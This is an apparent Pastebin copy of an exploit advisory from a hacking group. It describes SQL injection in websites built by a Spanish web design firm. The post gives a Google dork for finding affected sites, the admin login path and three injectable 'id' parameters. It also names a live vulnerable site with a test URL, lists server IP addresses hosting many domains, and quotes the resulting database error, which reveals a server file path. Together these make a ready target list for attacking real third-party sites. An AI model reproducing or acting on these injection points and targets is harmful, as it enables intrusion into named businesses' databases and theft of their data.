KingSkrupellos

Informatica Icarus Diteh Web Design Spain SQL Injection

Jan 9th, 2019
72
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.82 KB | None | 0 0
  1. ##################################################################
  2.  
  3. # Exploit Title : Informatica Icarus Diteh Web Design Spain SQL Injection Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 10/01/2019
  7. # Vendor Homepage : diteh.es
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:''diseno web informatica icarus diteh''
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. # Cyberizm Exploit Reference Link :
  15. cyberizm.org/cyberizm-informatica-icarus-diteh-web-design-spain-sql-injection.html
  16.  
  17. ##################################################################
  18.  
  19. # Admin Panel Login Path :
  20. ************************
  21. /zona_clientes/index.php
  22.  
  23. # SQL Injection Exploit :
  24. **********************
  25.  
  26. /novedades.php?id=[SQL Injection]
  27.  
  28. /instalaciones.php?id=[SQL Injection]
  29.  
  30. /servicios.php?id=[SQL Injection]
  31.  
  32. ##################################################################
  33.  
  34. # Example Vulnerable Site :
  35. ************************
  36.  
  37. Note : (168.1.77.76) => There are 89 domains hosted on this server.
  38.  
  39. Note : (62.82.17.9) => There are 112 domains hosted on this server.
  40.  
  41. [+] talleresmarin.net/novedades.php?id=45%27 =>
  42.  
  43. [ Proof of Concept ] => archive.fo/EPPky
  44.  
  45. ##################################################################
  46.  
  47. # SQL Database Error :
  48. *********************
  49.  
  50. Warning: mysql_fetch_array(): supplied argument is not a valid
  51.  
  52. MySQL result resource in c:\domains\talleresmarin.net\wwwroot\novedades.php on line 113
  53.  
  54. ##################################################################
  55.  
  56. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  57.  
  58. ##################################################################
Add Comment
Please, Sign In to add comment